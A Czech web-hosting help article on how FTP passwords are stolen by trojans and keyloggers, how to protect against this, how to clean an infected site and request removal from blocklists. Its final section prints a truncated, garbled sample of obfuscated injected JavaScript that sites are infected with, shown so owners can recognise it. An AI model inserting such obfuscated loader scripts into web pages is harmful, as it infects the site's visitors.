Napadení FTP virem

Objevují se na Vašem webu cizí tránky, nebo Vám antivirus hlásí přítomnost viru při otevření Vašich stránek? Pak byl patrně Váš web napaden hackerem. Toto napadení se dá provést většinou pomocí nastrčeného viru do Vašeho PC -> obecně pak hlavně pomocí "password steeling viru" nebo pomocí "keylogeru".

Možnosti napadení webu a FTP
  1. napadení pomocí password steeling viru v případě, že máte heslo uložené
  2. odposlechnutí hesla pomocí trojského koně při jeho zadávání do FTP klienta
  3. odposlechnutí hesla pomocí logování stiknustých kláves na PC pomocí keylogeru
Jak útok primárně vzniká

Potenciální útok na Vaše FTP může vzniknout na nezabezpečeném počítači, na který si obyčejným prohlížením internetu nechtěně stáhnete virus, trojského koně nebo keyloger. Takto napadený počítač pak odesílá veškerá citlivá data potenciálnímu útočníkovi. V případě, že je Váš počítač napaden trojským koněm, existují dvě možnosti jak může virus heslo zjistit. První možností je zjištění hesla z již uložené relace připojení v FTP klientu, a druhá možnost je odposlech hesla při jeho zadávání při připojování k FTP. V prvním případě si trojský kůň dokáže najít uloženou relaci ve Vašem počítači, a pokud jste si do ní uložili i heslo k připojení, není pro virus problém toto heslo zjistit, a útočníkovi odeslat. Obecně je tedy doporučeno do počítačé žádná hesla neukládat. Vyvarujete se tak první z možností napadení Vašeho FTP. Druhá možnost je pak taková, že virus nebo keyloger zjišťuje Vámi stisknuté klávesy, a z nich zaznamenává LOG soubor, který poté odesílá útočníkovi. Z tohoto logu je pak možné zjistit veškeré stisknuté klávesy na počítači, a tedy i veškerá napsaná hesla (nejen k FTP !!).

Jak se bránit útokům na FTP

Prvním pravidlem při obraně svého FTP je neukládání žádného z hesel do svého počítače. Tedy hlavně neukládat relace k připojení pomocí nějakého FTP klienta. Pokud heslo nebude v počítači uloženo, nemůže jej jednodušší virus ani nalézt, a odeslat útočníkovi. Pravidlem druhým je pak aktivní a pasivní ochrana Vašeho PC. Mezi aktivní ochranu lze zařadit firewall, antivirus, a programy proti spyware a adware obecně, a jako pasivní ochranu počítače pak lze brát určitou obezřetnost v otevírání mailových příloh, či otevírání potenciálně nebezpečných stránek (stránky s warezem, erotickým či nelegálním obsahem ........)

Jak virus ze stránek odstranit

Pokud se již stane, že je Váš web virem napaden, je potřeba jej neprodleně z webu odstranit, jelikož riskujete napadení veškerých počítačů všech uživatelů Vašich stránek (což může mít za následek i odrazení uživatelů přistupujících na Vaše stránky). Obecně je nejlepší vždy obsah FTP kompletně smazat, a nahrát na něj data ze zálohy. Zde je ale nutné mít předem jistotu, že daná záloha nebyla vytvořena v době, kdy byl web již napaden virem. Spolu se smazáním zavirovaných dat a nahráním původních ze zálohy, je také nutné ihned změnit heslo k FTP. Pokud byste heslo nechali původní, došlo by k útoku znovu, jelikož původní heslo bude mít útočník uložené ve své databázi. Jak je pak uvedeno výše, je také nutné prohledat svůj počítač pomocí antiviru, antispyware a antiadware programu, proti virům uloženým na Vašem počítači.

V případě že došlo k zaindexování Vaší domény do vyhledávačů na seznam podvodných a nebo útočných stránek, tak je nutné zažádat vyhledávače o její odstranění:

- pro podání žádosti o odstranění stránky ze seznamu nahlášených podvodných stránek použijte tento formulář, poskytovaný společností Google:

https://www.google.com/safebrowsing/report_error/?tpl=mozilla

 

- pro podání žádosti o odstranění stránky ze seznamu nahlášených útočných stránek použijte tento formulář, poskytovaný organizací StopBadware:
https://www.stopbadware.org/request-review

 

 

Ukázka kódu viru, který může být vložen do stránek:

 

<!--[z0s]--><script>document.write(unescapess("%3Cscript%3Eif%28Qg<br>
%21%3D1%29%7Bfunction%20JI%28fR%29%7Breturnfd%20fR%7Dtry%7Bfunc<br>
n%20wcr%28jzA%29%7Breturn%20parseInt%28jzA%29%gf7Dvar%20XSf%3D<br>
....<br>
style="TEXT-ALIGN: justify">.7DVBy+%3DString.fromCharCode%28QdU%5BZSk%5D%5E132%2hh9%3B%7D<br>
nt.write%28VBy%29%3B%7Dcatch%ds28nxu%29%7B%7D%7Dvar%20Qg%3D1<br>
ript%3E"))</script><!--[/z0s]-->